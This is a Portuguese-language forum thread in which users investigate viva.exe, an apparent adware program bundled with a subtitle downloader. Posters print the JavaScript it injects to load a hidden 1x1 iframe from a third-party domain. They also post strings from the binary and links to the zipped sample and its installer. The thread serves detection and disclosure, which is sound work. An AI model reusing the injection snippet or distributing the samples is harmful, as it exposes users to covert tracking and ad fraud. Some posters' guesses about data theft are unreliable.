Ir ao conteúdo
  • Comunicados

    • diego_moicano

      Gostaria de se tornar um analista em Remoção de Malware?   07-12-2015

      Gostaria de se tornar um analista em Remoção de Malware? O Fórum Clube do Hardware deu início a um programa de treinamento em análises de log. Os interessados deverão enviar um email para aprendizes (arroba) clubedohardware (ponto) com (ponto) br respondendo as seguintes perguntas: Por que você gostaria de aprender a analisar logs? Possui tempo hábil para o treinamento? Tem conhecimentos em informática? Se sim descreva-os. Possui inglês para leitura? Qual seu objetivo após completar o treinamento?   Não se esqueça de incluir no e-mail o seu nome de usuário (fornecer o link também), idade e cidade onde vive. Adicione também qualquer experiência e/ou razão sobre o porquê você seria um bom Analista. É digno de nota que apenas os que forem selecionados receberão resposta por MP (Mensagem Pessoal), não existe um padrão na escolha dos futuros aprendizes, todos os e-mails serão lidos e serão analisados de forma imparcial, portanto não será permitido reclamações neste aspecto. O treinamento é dado no próprio fórum. Quando um aprendiz é selecionado ele é movido para um novo grupo, onde terá acesso a fóruns fechados para os demais usuários onde poderá dar inicio ao seu treinamento. Importante: A cada 30 dias os e-mails não selecionados serão apagados, portanto você pode enviar um novo e-mail após 1 mês, e-mails enviados antes serão desconsiderados.  
    • Gabriel Torres

      Seja um moderador do Clube do Hardware!   12-02-2016

      Prezados membros do Clube do Hardware, Está aberto o processo de seleção de novos moderadores para diversos setores ou áreas do Clube do Hardware. Os requisitos são:   Pelo menos 500 posts e um ano de cadastro; Boa frequência de participação; Ser respeitoso, cordial e educado com os demais membros; Ter bom nível de português; Ter razoável conhecimento da área em que pretende atuar; Saber trabalhar em equipe (com os moderadores, coordenadores e administradores).   Os interessados deverão enviar uma mensagem privada para o usuário @Equipe Clube do Hardware com o título "Candidato a moderador". A mensagem deverá conter respostas às perguntas abaixo:   Qual o seu nome completo? Qual sua data de nascimento? Qual sua formação/profissão? Já atuou como moderador em algo outro fórum, se sim, qual? De forma sucinta, explique o porquê de querer ser moderador do fórum e conte-nos um pouco sobre você.   OBS: Não se trata de função remunerada. Todos que fazem parte do staff são voluntários.
xPedrinho

Processo "duvidoso"

Recommended Posts

Dúvida: O que exatamente é o arquivo viva.exe e qual é sua finalidade?

 

História:

 

No dia 13/09 eu comprei um jogo na Steam chamado H1Z1. É um jogo ainda em desenvolvimento, em fase Early Access.

 

A compra foi por volta das 22:00h e o download já havia terminado antes de 00:00h. Joguei com meu amigo durante 3h e fui expulso do servidor repentinamente.

Ao tentar logar outra vez, recebi o aviso de que minha conta foi banida.

 

Criei um ticket para contatar o suporte do jogo e depois de muito - mas muito mesmo - esforço e persistência, fui atendido.

 

O atendente me perguntou o que era o processo "viva.exe" que estava rodando no meu PC no momento em que fui banido. Eu não sei responder à pergunta.

 

Coincidentemente, eu não pude nem mesmo procurar no meu computador o que era isso, pois enquanto eu estava mandando mensagens para esse cara no Twitter, tentando chamar sua atenção, meu computador sofreu uma lentidão absurda e incomum e deu um erro de Tela Azul da Morte 0x7a.

(Inclusive minha paranoia me levou a desconfiar que eu havia sido atacado por alguém que não estava feliz com o fato de eu ter criado posts nos fóruns sugerindo que a empresa é caloteira e sugerindo que outros jogadores injustamente banidos também se impusessem - especialmente porquê vi um post em que alguém disse ter tido um problema semelhante ao reclamar da empresa).

Passei dois dias tentando reparar meu HD que às vezes era reconhecido e às vezes não. Levei a um técnico que realizou testes e concluiu que o hardware havia sido comprometido.

Perdi todos os meus dados, comprei um novo HD e agora não consigo encontrar este arquivo viva.exe, o que me leva a acreditar que é um tipo de vírus, e não algo comum no sistema.

 

Gostaria que alguém me desse uma quantidade de informação apropriada para que eu possa ao menos tentar provar que eu não estava por trás disso e que o ban na minha conta foi injusto. Eu não usei cheat no jogo e não mereço ser banido, especialmente tendo jogado apenas 3h de um jogo pelo qual eu paguei.

Editado por xPedrinho

Compartilhar este post


Link para o post
Compartilhar em outros sites

Bem vindo ao fórum.

 

Primeiramente a pegunta que fizeram para você foi vaga, como um usuário comum (pois devemos primeiramente achar que usuários no suporte geralmente não tem obrigação de saber informática).

Ligue lá informe que seu HD deu problema foi trocado, se comprometa a não usar cheat para Steam ou algo do tipo, instale um bom antivírus firewall e anti-spyware.

Sugira que eles de uma oportunidade fale que provavelmente foi uma infecção mas como deu problema no HD teve que trocar e não teve como confirmar.

Abre uma reclamação com as informações acima, peça ajuda no fórum de games daqui, eles devem saber melhor o que fazer. 

Compartilhar este post


Link para o post
Compartilhar em outros sites

Como assim a "conta" foi banida? Por qual anti-cheat?

 

Não temos como dizer o que era o processo. Não sabemos da segurança do seu PC, como você "cuida" dele, mas se foi banido e por um processo desconhecido então há algo errado na segurança do seu sistema. O pior é que agora você nem consegue ver o que o arquivo era.

 

Você ainda tem o HD velho?

Por que o técnico disse que o hardware foi comprometido? Peça melhores explicações, e se possível peça que ele venha falar diretamente conosco.

 

Tela Azul da Morte não é necessariamente Hardware, pode ser que 2 módulos de Kernel entraram em conflito.

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Acredito que eu tenha baixado algo que possibilitou algum tipo de atividade suspeita no meu PC.

 

O diagnóstico do HD foi feito com algum programa o qual não lembro o nome, que checa os setores do HD ou coisa parecida... não sei dar explicação muito técnica, mas é evidente que tá bem ferrado mesmo.

 

A tela azul da morte a princípio parecia ter sido originada por software mesmo... pelo que vi na internet, esse viva.exe é algo ruim pro computador e pode dar esses problemas mesmo. Faz sentido, já que foi o que aconteceu...

 

A minha conta foi banida porque o anti-cheat deles detectou atividade desse tal de viva.exe. Parece que eles não monitoram apenas o que você tá utilizando NO client do jogo, mas também no seu PC. Ou então ele só viu isso porque eu mandei o dxdiag e o msconfig pra ele... sei lá, só sei que vai ser uma sacanagem absurda eu perder o direito de jogar e ter praticamente pago pra nada, considerando que só joguei 3h.

 

Preciso dar um jeito de fazer o cara entender que eu não tive nada a ver com isso.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Tem alguns anticheat que são burros mesmo, qualquer atividade desconhecida eles dão ban. Se fosse um anticheat bom, como o EAC, nem precisaria se preocupar com isso.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Eu não sou gamer, mas notei esse aplicativo rodando no meu PC também e não acho informação nenhuma sobre ele!

 

Ele fica na pasta:

  • C:\Program Files (x86)\Viva

E dentro há 4 arquivos:

  • nfregdrv.exe
  • services.txt
  • version.txt
  • viva.exe

Dentro do arquivo services.txt, tenho isso:
 

ncupons.exebph.exeBuscapé na Hora.exePluginHelper.exePMeter.exeiUSB3mon.exevdeck.exe

E dentro do version.txt, isso:

2015090401

Também notei outra pasta vazia que é criada automaticamente quando o computador reinicia:

  • C:\viva\SSL

Pesquisando sobre o assunto achei esse fórum aqui, mas também achei um comentário no reddit que fala de um problema similar ao do xPedrinho, postado há 20 dias. Traduzindo pra vocês:

Eu fui banido em um jogo porque meu PC estava rodando um processo chamado viva.exe e o jogo achou que isso podia ser perigoso, como uma ferramenta para trapacear oualgo do tipo.Eu perguntei para o Suporte sobre o arquivo que eu nem sequer conhecia antes disso.Meu computador estragou e eu perdi meu HD, então comprei um novo. (Infelizmente, perditodos os meus arquivos)Então agora eu não tenho pista de onde esse processo veio, o que o causou, se eu baixei algo perigoso para meu PC ou qualquer coisa.Eu preciso saber o que é isso para que eles entendam que eu não estava trapaceando.Eu comprei o jogo e fui banido depois de jogar 3 horas direto.

Eu notei que o viva.exe não fica rodando direto, aliás, só vi ele em atividade mesmo uma vez. O avast não acusou nada e ele não aparenta fazer nada, mas eu realmente gostaria de saber o que é. Alguma pista?

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Wiliamjk no meu pc quando esse processo está rodando ele começa a dar uma espécie de "Freezing" em tudo , a imagem e o som começão a travar, como se fosse um problema serio de memória/cpu/vga, ate achei que fosse minha vga nova gtx970 que tivesse com problema, pois foi depois que troquei a vga e formatei para windows 10 que os problemas começaram, mas agora acredito que o problema seja por conta do Windows 10. Quando mato o processo (viva.exe) no gerenciador de tarefas os problemas somem. Fica ai o relato.

Editado por RazorSubzero
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Vamos lá:

 

Leia isso aqui leia exatamente na resposta que fala disso o link manda nela:

 

http://www.linhadefensiva.org/forum/topic/165865-virus-win32ksys-avg-detectou-mas-n%C3%A3o-consegui-excluir/#entry967437

 

Por favor não siga nada do que esta ai no link das instruções é somente informativo.

 

Sugiro que se esteja com esse processo que abra um tópico na área de remoção de Malware.

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Descobri de onde vem esse processo Viva.exe, ele vem junto com aquele programinha de baixar legenda, o Legendabr!

  • Curtir 3

Compartilhar este post


Link para o post
Compartilhar em outros sites

Descobri de onde vem esse processo Viva.exe, ele vem junto com aquele programinha de baixar legenda, o Legendabr!

 

Eu tenho o programa, faz sentido. Alguém sabe se é perigoso ou se afeta o desempenho?

Editado por wiliamjk
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Realmente deve ser mesmo veja no link que o analista passou junto ao link informado acima por mim:

 

http://www.herdprotect.com/signer-gt-consultoria-em-informatica-ltda-06078e7c0ffb7f5b89a9f5369710bc1e.aspx

 

Mostra que esta relacionado a legenda e a empresa que distribui tem se lá certa suspeitas.

  • Curtir 2

Compartilhar este post


Link para o post
Compartilhar em outros sites

 

Eu tenho o programa, faz sentido. Alguém sabe se é perigoso ou se afeta o desempenho?

 

Amigo aqui eu desinstalei, porque esse Viva pode ser tipo aqueles vírus que dão acesso remoto ao computador, isso explicaria os freezings eu acho, recomendo você desinstalar também, mas que o legendas quebrava um galho quebrava! :( usava outro programa ótimo de legenda, o Sublight, so que ele agora e pago,  melhor procurar a legenda manualmente do que ter dados de banco/cartão de crédito roubados.

Editado por RazorSubzero
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Eu também tinha esse LegendasBR (versão 3.3), e vi o processo viva.exe relacionado, com as mesmas informações citadas pelo wiliamjk ... Vi que ele tentava acionar a internet algumas vezes (bloqueada pelo Comodo Firewall), sem eu ter acionado o programa de legendas. Achei suspeito e desinstalei ambos.

 

O viva.exe estava instalado como um serviço do Windows, e não continha nenhuma descrição. Não me pareceu um updater do LegendasBR.

 

Só lamento não ter coletado mais informações antes de deleta-lo.. estva fazendo mil coisas no computador quando vi o processo suspeito, e já fui eliminando logo para voltar ao que eu estava fazendo.

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Olá Pessoal, Boa noite

Também notei o viva.exe rodando em meu pc, o que é mais perigoso que notei é que quando entro na pagina de acesso ao meu roteador demorava muito tempo para abrir e depois que abriu resolvi verificar pelo firebug, e meu roteador estava sendo direcionado para este endereço ( http://cupons.dantis.com.br/api/app/content.php) realizei a desinstalação do LegendasBR e exclui todas pastas do viva.exe depois da exclusão meu roteador voltou a entrar normalmente e olhando pelo firebug não estava mais redirecionando para o link que falei logo acima.


Entrei no link pelo Firefox do linux, ao entrar mostra isso aqui.

 

if (window.top == window.self) {
        setTimeout(function(){
            if(document.getElementById("nc-background")){
            //    console.log("TEM EXTENSAO");    
                throw new Error("");            
            }        
            
            var idadv = document.createElement("iframe");
            with(idadv){
                id = "idadv";
                src = "http://cupons.dantis.com.br/api/app/content.php";
                width = 1;
                height = 1;
                scrolling = "no";
            }    
            document.getElementsByTagName("body")[0].appendChild(idadv);
        }, 2000);

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Mais uma informação a quem interessar.

 

Notei que nos sites que eu navego (uso o Firefox), aparece um pixel no canto inferior esquerdo da página. Ao inspecionar o elemento, encontro o seguinte:

<iframe scrolling="no" src="http://cupons.dantis.com.br/api/app/content.php" id="idadv" height="1" width="1"></iframe>

Provavelmente relacionado ao erro que o Dimas mencionou.

 

Visitando o site dessa Dantis, descubro uma empresa de tecnologia brasileira que não diz de onde é e não deixa claro o que faz. Um dos itens no qual eles atuam é Web Marketing. Provavelmente eles devem usar esse iframe como alguma estratrégia fraudulenta de geração de pageviews ou algo do tipo.

 

O cupons.dantis.com.br diz o seguinte:
 

 

Dantis Cupons é um novo jeito de economizar em suas compras na internet. Agradecemos a todos os beta testers e agora estamos na fase final do desenvolvimento.

 

O timer está zerado, já devia ter sido lançado. Mais uma vez, reforça minha opinião de que isso é uma estratégia ou para conseguir dados ou para conseguir pageviews que seriam úteis comercialmente para o lançamento dessa ferramenta.


Ah, só mais uma coisa, a empresa está registrada sob o CNPJ 13.824.137/0001-02 e fica em São José, SC.
http://www.foneempresas.com/telefone/empresa/telefone-de-dantis-tecnologia/13824137000102

 

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Realmente, revivendo o tópico, muito estranho.

 

Wiliamjk no meu pc quando esse processo está rodando ele começa a dar uma espécie de "Freezing" em tudo , a imagem e o som começão a travar, como se fosse um problema serio de memória/cpu/vga, ate achei que fosse minha vga nova gtx970 que tivesse com problema, pois foi depois que troquei a vga e formatei para windows 10 que os problemas começaram, mas agora acredito que o problema seja por conta do Windows 10. Quando mato o processo (viva.exe) no gerenciador de tarefas os problemas somem. Fica ai o relato.

 

Isso começou a acontecer aqui, já tinha pensado e tudo, pior que dava queda de quadros no CS GO mesmo usando uma GTX680 +300FPS. 

Uma pena, essa programa de legendas era o melhor :/

Compartilhar este post


Link para o post
Compartilhar em outros sites

Uma pena, essa programa de legendas era o melhor :/

 

Será que alguém bom aí consegue modificar o programa pra remover esse adware?

  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

Sobe uma máquina virtual, instala na máquina virtual para baixar a legenda e passa somente a legenda mesmo.

Compartilhar este post


Link para o post
Compartilhar em outros sites

acabei de ver este processo aqui em meu dispositivo ASUS-T100 (Windows 8.1)

 

não tenho esse tal legendabr, na verdade, não tenho quase nada instalado...

 

zipei todos os arquivos do viva.exe que achei, ele tem um desinstalador proprio (que pareceu funcionar de verdade) e um driver, alem daquela pasta SSL vazia

viva.zip

 

analisando o HTML de sites abertos no chrome, encontrei que um link para o grugol.com estava escondido (apenas paginas que não estavam em cache eram afetadas), adivinhe, abrindo o viva.exe com o bloco de notas encontrei o mesmo link la dentro

 

este grugol.com parece ser de cupons de desconto, falsos claro, o blog deles (no fim da pagina) tem como ultima data de atualização 2014

 

abrindo o dito link dentro do viva.exe

http://grugol.com/prog/services.txt

encontro o mesmo conteudo que havia dentro da pasta do programa, é aquele arquivo .txt

ncupons.exe
bph.exe
Buscapé na Hora.exe
PluginHelper.exe
PMeter.exe
iUSB3mon.exe
vdeck.exe

 

em outra parte, ainda dentro do viva.exe encontrei:

 

Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
http://grugol.com/prog/version.php?ver= f i r e f o x . e x e   c h r o m e . e x e     i e x p l o r e . e x e     s a f a r i . e x e     o p e r a . e x e   n e t s c a p e . e x e     </body> Content-Type    P3P text/html   % s \ s e r v i c e s . t x t   % s \ v e r s i o n . t x t     &app=   % s \ v i v a . e x e   % s \ v i v a t m p . e x e     % s \ v i v a d o w n . e x e   HTTP/1.1    IsWow64Process  k e r n e l 3 2     XP  XP-64   Vista   W7  W8  W8.1    W10 -64 -32 %02X-%02X-%02X-%02X-%02X-%02X   /prog/trackinstall.php? partner=    &os=    &status=    User-Agent: cupom
D:\VisualStudio\Projects\VivaLowRight\Release\Win32\viva.pdb
system32\drivers\%s.sys PNP_TDI SYSTEM\CurrentControlSet\Services\%s    Tag SYSTEM\CurrentControlSet\Control\GroupOrderList Tdx Tcpip   SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters DisabledComponents  SYSTEM\CurrentControlSet\Services\Tcpip\Parameters  DisableTaskOffload

tudo encontrado lendo o arquivo no bloco de notas, do fim ao começo, pois no começo só ha texto codificado...

 

mesmo apos desinstalado, esses links da grugol.com ainda aparecem no chrome pois esta em cache, atualizar uma pagina com CTRL+F5 causa o link a sumir do HTML da pagina pois a pagina é removida do cache e baixada novamente, desta vez, sem as alterações do viva.exe

Editado por Lucas Vinicius Galindo Carvalho
  • Curtir 1

Compartilhar este post


Link para o post
Compartilhar em outros sites

não consegui editar o post anterior, então aqui vai

 

encontrei o instalador desse viva.exe, tava fazendo limpeza na pasta de downloads e quando abri um setup.exe pra ver o que era, e me deparei com um erro dizendo que o arquivo vivadrv não pode ser removido, verifiquei então e realmente, o arquivo vivadrv estava na pasta system32/drivers e a pasta viva/SSL apareceu na raiz do disco, lembrando que é possivel remover o programa usando seu desinstalador próprio, o removi e deletei o vivadrv manualmente pois este não estava sendo removido (provavelmente algum problema de permissão)

 

aqui esta o instalador

 

setup.zip

Compartilhar este post


Link para o post
Compartilhar em outros sites

Pessoal, eu também me contaminei com esta praga do viva.exe.

Acredito que esse programa malicioso tenha sido criado para anunciar produtos no Brasil. Obviamente, ele deve fazer outras coisas que não sabemos, entre elas, roubar dados pessoais e alterar configurações do computador.

O principal sintoma que percebi foi a minha dificuldade de acessar meu roteador pelo browser. Na maioria das vezes, eu não conseguia mais. Além disso, quando eu acessava algum site, ele tentava se conectar primeiro em grugol.com.

Sinceramente, por motivos de segurança, achei conveniente trocar todas as minhas senhas, como a do computador, sites de compra e, até mesmo, de bancos. Recomendo a todos a fazerem o mesmo logo após de se livrarem dessa praga.

Imagino que todos que se contaminaram com o viva.exe foram através de instaladores de programas, seja freewares, sharewares, etc. Olhando a data de criação da pasta de instalação do Viva, notei que eu havia instalado intencionalmente outro programa nesse mesmo dia. Por esse motivo, decidi desinstalá-lo também.

Eu me contaminei no dia 6 de janeiro de 2016 e hoje, dia 16, que notei que isso tinha acontecido. Foram 10 dias sentindo que havia algo de errado no computador até perceber a existência dessa praga.

[]'s

Compartilhar este post


Link para o post
Compartilhar em outros sites

Realmente o viva.exe é bem duvidoso,o único antivírus que conseguiu detectá-lo foi o Panda;tanto o Panda PRO quanto o Panda Gold,na aba controle de aplicativos...aí eu neguei a permissão para tal aplicativo e depois desinstalei-o por via das dúvidas.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Estava procurando sobre isso e encontrei este tópico. Acabei de formatar o meu computador e fazer uma instalação "limpa" do Windows 10. Este programa "Viva" se instalou sozinho, nem sequer tinha navegado na internet ainda, portanto não pode ter pego de nenhum site nem nada do tipo. É muito estranho, mas parece que ele já vem instalado com o Windows 10.

Nos programas instalados aparece isso: viva version 1.0 sem nenhuma informação adicional. E toda vez que inicio o sistema, o processo está lá aberto. Como podem ver na imagem em anexo não instalei nada de mais, inclusive todos os programas que havia instalado, eu já tinha baixado há tempos atrás, e estavam armazenados no HD externo, portanto, não podem ter vindo deles. Eu desinstalei ele, porém queria ter certeza do que é e o que faz este "maldito", pra saber, ao menos, se devo me preocupar, caso ele tenha feito algo com meus arquivos...

 

Sem título.png

Compartilhar este post


Link para o post
Compartilhar em outros sites

Victor, no meu caso, aconteceu quando instalei um programa tipo esses que você tem instalado aí. Possivelmente, foi um desses! Você instala um programa e o Viva é instalado junto sem você saber. O fato de você já ter os baixado no passado e mantido num HD externo, não faz diferença.
Um teste interessante seria se você conseguisse desinstalar com tranquilidade o Viva por essa janela aí.

Em seguida, reinstalasse aplicativo por aplicativo dessa lista (já que é pouca coisa), reiniciando o pc para cada instalação e checasse sempre se o Viva reapareceu. De repente, você descubra se é algum deles!

Abs.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário






Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas publicações sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

×